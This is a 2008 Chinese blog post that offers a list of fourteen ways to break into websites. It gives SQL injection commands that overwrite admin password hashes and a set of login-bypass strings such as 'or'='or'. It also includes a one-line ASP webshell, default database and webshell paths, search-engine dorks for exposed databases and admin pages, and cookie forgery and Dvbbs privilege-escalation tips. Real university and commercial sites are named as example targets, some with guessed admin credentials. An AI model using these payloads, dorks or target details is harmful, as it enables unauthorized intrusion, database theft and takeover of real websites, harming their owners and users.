注册 登录  
 加关注
查看详情
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

冷月寒星

 
 
 

日志

 
 

入侵的14种可利用方法  

2008-05-29 14:45:22|  分类: 黑客技术 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

1.上传漏洞[不多讲]

  pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!

      有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

 

2.注入漏洞[不多讲]

  pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:

     http://注入网址;update admin set password='新MD5密码' where password='旧MD5密码'--      [admin为表名.]

 

3.旁注,也就是跨站.

 我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了

 

 

4.暴库:把二级目录中间的/换成%5c

  EY:http://www.ahttc.edu.cn/otherweb/dz/bgs/BigClass.asp?BigClassName=职责范围&BigClassType=1

  如果你能看到:'E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否  连接到文件存放的服务器。

  这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.

 

 

5.'or'='or'这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:

  'or''='  " or "a"="a     ') or ('a'='a     ") or ("a"="a    or 1=1--   ' or 'a'='a

 

6.社会工程学。这个我们都知道吧。就是猜解。

 EY:http://www.neu.edu.cn/waishi/admin

        admin   waishi

 

7.写入ASP格式数据库。就是一句话木马[<%execute request("value")%> ],常用在留言本.

  EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库],再写入一句话木马

  

 

8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.

  EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp

  这个站用的是:杰出校友录,源码我下过了,

  默认数据库/webshell路径:\database\liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin

    

 

9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.

/Databackup/dvbbs7.MDB

/bbs/Databackup/dvbbs7.MDB

/bbs/Data/dvbbs7.MDB

/data/dvbbs7.mdb

/bbs/diy.asp

/diy.asp

/bbs/cmd.asp

/bbs/cmd.exe

/bbs/s-u.exe

/bbs/servu.exe

工具:网站猎手  挖掘鸡

EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB

 

10.查看目录法:人一些网站可以断开目录,可以方问目录。

EY:http://www.ujs168.com/shop/admin/

    http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/

    这样我们可以找到数据库,下载不用我教吧

 

11.工具溢出:.asp?NewsID=   /2j.asp?id=18   .asp?id=[这种方法可以取得大量的WEBSHELL]

          

12.搜索引擎利用:

 

(1).inurl:flasher_list.asp   默认数据库:database/flash.mdb   后台/manager/

(2).找网站的管理后台地址:

site:xxxx.comintext:管理

site:xxxx.comintitle:管理   <关键字很多,自已找>

site:xxxx.cominurl:login

(3).查找access的数据库,mssql、mysql的连接文件

allinurl:bbsdata

filetype:mdbinurl:database

filetype:incconn

inurl:datafiletype:mdb

我主不做了。。自已做做吧。。

 

13.COOKIE诈骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。这个我就不多讲了

 

14.利用常见的漏洞:如动网BBS

 EY:http://js1011.com/bbs/index.asp

 可以先用:dvbbs权限提升工具,使自已成为前台管理员。

 THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包

 这个我就不做了,网上教程多的是,自已下个看看。

 工具:dvbbs权限提升工具   动网固顶贴工具

  评论这张
 
阅读(103)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018